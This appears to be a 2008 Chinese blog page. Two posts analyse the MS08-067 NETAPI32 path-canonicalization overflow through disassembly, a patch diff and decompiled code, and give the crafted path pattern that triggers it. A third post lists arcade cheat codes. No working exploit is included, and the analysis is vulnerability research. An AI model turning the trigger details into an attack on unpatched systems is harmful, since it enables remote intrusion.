估计很多人在这里绕晕了,我跟了一晚上,总算搞明白了一点。

首先是为什么老是会上溢的问题,这个就是这个漏洞的原因所在了。cocoruder在blog上引用了这么一段话:
There are two copies, the first copy is OK, but when there is another "..\", it will lead to start the another copy (repeat the first copy codes), the second copy firstly does not calculate the base pointer correctly (firstly it is basePointer-2, so the 'JZ' checking in the loop of searching character '\' will never come ture), that lead to get an unexpected stack pointer which is below the base pointer, after the wrong calculation, it starts the second copy and uses the unexpected pointer as the first parameter of function "wcscpy()", therefore, the wrong-calculation memory will be rewritten. The EIP will be controlled in the main function, probably.

实际上就是在找目录的时候,

\x\..\yyyyyyyyyyyyy

会拷贝为 \yyyyyyyyyyyy   中间的 \x\.. 就没有了。

然后程序会往栈的上面去找 "\" 的存在,但是往往栈低址里没有 "\"的存在,所以就找完了整个栈,上溢了。

很多同学估计都卡在这个地方了。

bp 0x71baa398 first copy 第一次拷贝,这里没问题

71BCDC12    8D46 04         LEA EAX,DWORD PTR DS:[ESI+4]
71BCDC15    8BCE            MOV ECX,ESI
71BCDC17    50              PUSH EAX
71BCDC18    51              PUSH ECX
71BCDC19    FF15 2C10BA71   CALL DWORD PTR DS:[<&msvcrt.wcscpy>]     ; msvcrt.wcscpy

此时 si = 0x2e 然后前后判断是否是 \..\

71BAA363    8D46 FE         LEA EAX,DWORD PTR DS:[ESI-2]
71BAA366    3BD8            CMP EBX,EAX
71BAA368    0F85 50380200   JNZ NETAPI32.71BCDBBE
71BAA36E    8D46 02         LEA EAX,DWORD PTR DS:[ESI+2]
71BAA371    66:8B10         MOV DX,WORD PTR DS:[EAX]
71BAA374    66:83FA 2E      CMP DX,2E
71BAA378    0F85 8A380200   JNZ NETAPI32.71BCDC08
71BAA37E    8D46 04         LEA EAX,DWORD PTR DS:[ESI+4]
71BAA381    66:8B18         MOV BX,WORD PTR DS:[EAX]
71BAA384    66:83FB 5C      CMP BX,5C

second copy 第二个拷贝,把中间的 \x\.. 弄没了
71BAA388   /0F85 3D380200   JNZ NETAPI32.71BCDBCB
71BAA38E   |85FF            TEST EDI,EDI
71BAA390   |0F84 0B630000   JE NETAPI32.71BB06A1
71BAA396   |50              PUSH EAX
71BAA397   |57              PUSH EDI
71BAA398   |FF15 2C10BA71   CALL DWORD PTR DS:[<&msvcrt.wcscpy>]     ; msvcrt.wcscpy

漏洞代码就是下面这个:
71BCDBDE    8D47 FE         LEA EAX,DWORD PTR DS:[EDI-2]
71BCDBE1    66:8338 5C      CMP WORD PTR DS:[EAX],5C
71BCDBE5   /75 18           JNZ SHORT NETAPI32.71BCDBFF
71BCDBE7   |66:8B38         MOV DI,WORD PTR DS:[EAX]
71BCDBEA   |8B4D 08         MOV ECX,DWORD PTR SS:[EBP+8]
71BCDBED   |66:83EF 5C      SUB DI,5C
71BCDBF1   |66:F7DF         NEG DI
71BCDBF4   |1BFF            SBB EDI,EDI
71BCDBF6   |F7D7            NOT EDI
71BCDBF8   |23F8            AND EDI,EAX
71BCDBFA ^|E9 55C7FDFF     JMP NETAPI32.71BAA354
71BCDBFF   \3B45 08         CMP EAX,DWORD PTR SS:[EBP+8]
71BCDC02 ^ 74 E3           JE SHORT NETAPI32.71BCDBE7
71BCDC04    48              DEC EAX
71BCDC05    48              DEC EAX
71BCDC06 ^ EB D9           JMP SHORT NETAPI32.71BCDBE1

试图往栈低址去寻找"\",结果错误计算了开始的地址,导致根本找不到。

按照cocoruder的说法,在计算错误后,有机会第二次执行第二个 wcscpy ,从而覆盖那个错误计算出的地址。

不过我没找到能再次执行拷贝的方法,我的整个栈低址几乎就是一片0,每次都上溢了.

有的机器里也许能够找到那个“\”
吧,或者存在一种能够稳定利用的方法。

使用 \\pipe\browser 好像也有机会控制EIP,可以继续搞搞。

瞎扯到这里,不说了,大家再一起继续郁闷吧。

分类: 技术文章 标签:

MS08067补丁前后比较分析结果

2008年10月26日 没有评论 89 views

作者:Friddy

MS08-067: Server 服务中的漏洞可能允许远程代码执行
http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx
这条更新为重要,可以说与当年的冲击波类似。上午我对补丁前后分析,定位到微软修改过的函数结果如下:

发生缓冲区溢出的函数:
signed int __stdcall sub_5FDDA180(int a1, wchar_t *a2, int a3, int a4, int a5)
{
wchar_t *v5; // ebx@1
size_t v6; // edi@1
int v7; // esi@1
int v8; // edi@3
signed int result; // eax@4
wchar_t *v10; // eax@5
unsigned int v11; // eax@10
size_t v12; // eax@14
__int16 v13; // ax@16
size_t v14; // eax@3
int v15; // [sp+428h] [bp-4h]@1
wchar_t *v16; // [sp+10h] [bp-41Ch]@1
int v17; // [sp+Ch] [bp-420h]@1
wchar_t v18; // [sp+14h] [bp-418h]@2

v5 = a2;
v15 = dword_5FE1E18C;
v7 = a1;
v16 = (wchar_t *)a3;
v6 = 0;
v17 = a5;
if ( a1 && *(_WORD *)a1 )
{
v12 = wcslen((const wchar_t *)a1);
v6 = v12;
if ( v12 )
{
if ( v12 > 0x208 )
return 123;
wcscpy(&v18, (const wchar_t *)v7);
v13 = LOWORD((&v16)[v6 + 1]);
if ( v13 != 92 )
{
if ( v13 != 47 )
{
wcscat(&v18, &word_5FDECBD4);
++v6;
}
}
if ( *v5 == 92 || *v5 == 47 )
++v5;
}
}
else
{
v18 = 0;
}
v14 = wcslen(v5);
v8 = v14 + v6;
if ( v8 < v14 )
return 123;
if ( (unsigned int)v8 > 0x207 )
return 123;
wcscat(&v18, v5);
v10 = &v18;
if ( v18 )
{
do
{
if ( *v10 == 47 )
*v10 = 92;
++v10;
}
while ( *v10 );
}
if ( !sub_5FDD9F7A(&v18) && !sub_5FDDA26B((int)&v18) )//这个函数修改过了
return 123;
v11 = 2 * wcslen(&v18) + 2;
if ( v11 > a4 )
{
if ( v17 )
*(_DWORD *)v17 = v11;
result = 2123;
}
else
{
wcscpy(v16, &v18);//缓冲区溢出点
result = 0;
}
return result;
}

被修改的函数:
//----- (5FDDA26B) --------------------------------------------------------
signed int __stdcall sub_5FDDA26B(int a1)
{
wchar_t v1; // ax@1
int v2; // ecx@1
int v3; // ebx@1
int v4; // edi@1
int v5; // esi@3
int v6; // eax@10
__int16 v7; // dx@10
__int16 v8; // bx@11
__int16 v10; // dx@17
int v11; // ecx@18
__int16 v12; // ax@19
int v13; // eax@34
wchar_t *v14; // ecx@41
char v15; // zf@1
int v16; // [sp+Ch] [bp-4h]@1

v2 = a1;
v1 = *(_WORD *)a1;
v3 = 0;
v4 = 0;
v15 = *(_WORD *)a1 == 92;
v16 = 0;
if ( v15 || v1 == 47 )
{
v10 = *(_WORD *)(a1 + 2);
if ( v10 == 92 || v10 == 47 )
{
v11 = a1 + 4;
while ( 1 )
{
v12 = *(_WORD *)v11;
if ( *(_WORD *)v11 == 92 )
break;
if ( v12 == 47 )
break;
if ( !v12 )
return 0;
v11 += 2;
}
if ( !*(_WORD *)v11 || (v2 = v11 + 2, v1 = *(_WORD *)v2, a1 = v2, v1 == 92) || v1 == 47 )
return 0;
}
}
v5 = v2;
if ( !v1 )
return 1;
while ( 1 )
{
if ( v1 == 92 )
{
if ( v3 == v5 - 2 )
return 0;
v4 = v3;
v16 = v5;
goto LABEL_6;
}
if ( v1 != 46 || v3 != v5 - 2 && v5 != v2 )
goto LABEL_6;
v6 = v5 + 2;
v7 = *(_WORD *)(v5 + 2);
if ( v7 == 46 )
{
v8 = *(_WORD *)(v5 + 4);
if ( v8 == 92 || !v8 )
{
if ( !v4 )
return 0;
wcscpy((wchar_t *)v4, (const wchar_t *)(v5 + 4)); //可能会发生缓冲区溢出
if ( !v8 )
return 1;
v16 = v4;
v5 = v4;
v13 = v4 - 2;
while ( *(_WORD *)v13 != 92 && v13 != a1 )
v13 -= 2;
v2 = a1;
v4 = v13 & -(*(_WORD *)v13 == 92);
}
goto LABEL_6;
}
if ( v7 != 92 )
break;
if ( v3 )
{
v14 = (wchar_t *)v3;
}
else
{
v6 = v5 + 4;
v14 = (wchar_t *)v5;
}
wcscpy(v14, (const wchar_t *)v6);//可能会发生缓冲区溢出
v2 = a1;
LABEL_7:
v1 = *(_WORD *)v5;
if ( !*(_WORD *)v5 )
return 1;
v3 = v16;
}
if ( v7 )
{
LABEL_6:
v5 += 2;
goto LABEL_7;
}
if ( v3 )
v5 = v3;
*(_WORD *)v5 = 0;
return 1;
}

分类: 技术文章 标签:

圆桌骑士 红魔杖|绿魔杖|红震|绿震 EC作弊码

2008年10月25日 2 条评论 2,139 views
[无限时间]
ON=E7DB,59

[P1 角色]
Lancelot=AC4D,0
Arthur=AC4D,1
Perceval=AC4D,2

[P1 体力值]
ON=ABA4,50

[P1 生命数]
ON=AC77,9

[P1 升级完毕 Lv16]
ON=AC4F,0F;AC8D,99;AC8E,99;AC8F,99;AC90,99

[P1 无敌]
OFF=0000,0
ON=AC7B,fe

[P2 角色]
Lancelot=AD6D,0
Arthur=AD6D,1
Perceval=AD6D,2

[P2 体力值]
ON=ACC4,50

[P2 生命数]
ON=AD97,9

[P2 升级完毕 Lv16]
ON=AD6F,0F;ADAD,99;ADAE,99;ADAF,99;ADB0,99

[P2 无敌]
OFF=0000,0
ON=AD9B,fe

[P3 角色]
Lancelot=AE8D,0
Arthur=AE8D,1
Perceval=AE8D,2

[P3 体力值]
ON=ADE4,50

[P3 生命数]
ON=AEB7,9

[P3 升级完毕 Lv16]
ON=AE8F,0F;AECD,99;AECE,99;AECF,99;AED0,99

[P3 无敌]
OFF=0000,0
ON=AEBB,fe

[爆1UP,绿魔杖,2UP(在没兵或兵不会动的情况下才有效)]
ON=89d7,a2

[选择关卡]
.NONE.=0000,0
第一关=A4C5,0
第二关=A4C5,1
第三关=A4C5,2
第四关=A4C5,3
第五关=A4C5,4
第六关=A4C5,5
第七关=A4C5,6

[箱子打出的物品]
茶具=C298,12;C358,12;C418,12;C4D8,12;C598,12;C7D8,12;C898,12;C958,12;CA18,12;CAD8,12;CD08,12;D498,12;D918,12;D9D8,12;DA98,12;DB58,12;DC18,12;DCD8,12;DD98,12;DE58,12;DF18,12;DFD8,12;E098,12;E158,12

牛奶=C298,9;C358,9;C418,9;C4D8,9;C598,9;C7D8,9;C898,9;C958,9;CA18,9;CAD8,9;CD08,9;D498,9;D918,9;D9D8,9;DA98,9;DB58,9;DC18,9;DCD8,9;DD98,9;DE58,9;DF18,9;DFD8,9;E098,9;E158,9

大面包=C298,7;C358,7;C418,7;C4D8,7;C598,7;C7D8,7;C898,7;C958,7;CA18,7;CAD8,7;CD08,7;D498,7;D918,7;D9D8,7;DA98,7;DB58,7;DC18,7;DCD8,7;DD98,7;DE58,7;DF18,7;DFD8,7;E098,7;E158,7

蔬菜盘=C298,2;C358,2;C418,2;C4D8,2;C598,2;C7D8,2;C898,2;C958,2;CA18,2;CAD8,2;CD08,2;D498,2;D918,2;D9D8,2;DA98,2;DB58,2;DC18,2;DCD8,2;DD98,2;DE58,2;DF18,2;DFD8,2;E098,2;E158,2

水果盘=C298,4;C358,4;C418,4;C4D8,4;C598,4;C7D8,4;C898,4;C958,4;CA18,4;CAD8,4;CD08,4;D498,4;D918,4;D9D8,4;DA98,4;DB58,4;DC18,4;DCD8,4;DD98,4;DE58,4;DF18,4;DFD8,4;E098,4;E158,4

烤火鸡=C298,00;C358,00;C418,00;C4D8,00;C598,00;C7D8,00;C898,00;C958,00;CA18,00;CAD8,00;CD08,00;D498,00;D918,00;D9D8,00;DA98,00;DB58,00;DC18,00;DCD8,00;DD98,00;DE58,00;DF18,00;DFD8,00;E098,00;E158,00

红震=C298,16;C358,16;C418,16;C4D8,16;C598,16;C7D8,16;C898,16;C958,16;CA18,16;CAD8,16;CD08,16;D498,16;D918,16;D9D8,16;DA98,16;DB58,16;DC18,16;DCD8,16;DD98,16;DE58,16;DF18,16;DFD8,16;E098,16;E158,16

绿震=C298,17;C358,17;C418,17;C4D8,17;C598,17;C7D8,17;C898,17;C958,17;CA18,17;CAD8,17;CD08,17;D498,17;D918,17;D9D8,17;DA98,17;DB58,17;DC18,17;DCD8,17;DD98,17;DE58,17;DF18,17;DFD8,17;E098,17;E158,17

绿魔杖=C298,19;C358,19;C418,19;C4D8,19;C598,19;C7D8,19;C898,19;C958,19;CA18,19;CAD8,19;CD08,19;D498,19;D918,19;D9D8,19;DA98,19;DB58,19;DC18,19;DCD8,19;DD98,19;DE58,19;DF18,19;DFD8,19;E098,19;E158,19

红魔杖=C298,18;C358,18;C418,18;C4D8,18;C598,18;C7D8,18;C898,18;C958,18;CA18,18;CAD8,18;CD08,18;D498,18;D918,18;D9D8,18;DA98,18;DB58,18;DC18,18;DCD8,18;DD98,18;DE58,18;DF18,18;DFD8,18;E098,18;E158,18

1UP=C298,1A;C358,1A;C418,1A;C4D8,1A;C598,1A;C7D8,1A;C898,1A;C958,1A;CA18,1A;CAD8,1A;CD08,1A;D498,1A;D918,1A;D9D8,1A;DA98,1A;DB58,1A;DC18,1A;DCD8,1A;DD98,1A;DE58,1A;DF18,1A;DFD8,1A;E098,1A;E158,1A

2UP=C298,1B;C358,1B;C418,1B;C4D8,1B;C598,1B;C7D8,1B;C898,1B;C958,1B;CA18,1B;CAD8,1B;CD08,1B;D498,1B;D918,1B;D9D8,1B;DA98,1B;DB58,1B;DC18,1B;DCD8,1B;DD98,1B;DE58,1B;DF18,1B;DFD8,1B;E098,1B;E158,1B

马=C298,1C;C358,1C;C418,1C;C4D8,1C;C598,1C;C7D8,1C;C898,1C;C958,1C;CA18,1C;CAD8,1C;CD08,1C;D498,1C;D918,1C;D9D8,1C;DA98,1C;DB58,1C;DC18,1C;DCD8,1C;DD98,1C;DE58,1C;DF18,1C;DFD8,1C;E098,1C;E158,1C

[GameInfo]
Name=圆桌骑士 (CPS1)
System=CPS1
Text=圆桌骑士,双人至三人、清版过关游戏,选择关卡时最好能在选人物的画面时锁定,成功后需解锁!

分类: 资源共享 标签: